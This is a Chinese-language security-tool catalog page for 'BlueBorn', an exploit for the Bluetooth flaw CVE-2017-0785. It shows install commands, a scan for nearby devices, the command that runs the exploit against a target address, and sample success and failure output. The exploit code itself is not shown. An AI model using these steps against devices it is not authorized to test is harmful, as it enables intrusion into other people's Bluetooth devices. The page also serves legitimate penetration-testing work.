Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
BlueBorn — CVE-2017-0785 | Kitploit
工具/GitHubGitHub/sh4rknado/blueborn
蓝牙安全漏洞分析漏洞利用无线安全渗透测试
GitHubsh4rknado/blueborn

BlueBorn

CVE-2017-0785

查看仓库
13年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

BlueBorn

CVE-2017-0785

Archlinux 安装

paru -S python-pybluez-git bluez-utils-compat pyhton3 python3-pip

sudo pip install pwn

教程

发现

root@kitploit:~
hcitool scan
Scanning ...
      XX:XX:XX:XX:XX:XX       Device 1
      XX:XX:XX:XX:XX:XX       Device 2

使用漏洞

root@kitploit:~
python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX

[V] Exploit: Done!


 python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX ==> FAILED EXEMPLE

[◒] Exploit: Connecting to target

Traceback (most recent call last):

File "<string>", line 3, in connect

_bluetooth.error: (110, 'Connection timed out')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):

File "/opt/Hacking-tools/Bluetooth/CVE-2017-0785/CVE-2017-0785.py", line 31, in <module>

  sock.connect((target, 1))

File "<string>", line 5, in connect

bluetooth.btcommon.BluetoothError: [Errno 110] Connection timed out
下载工具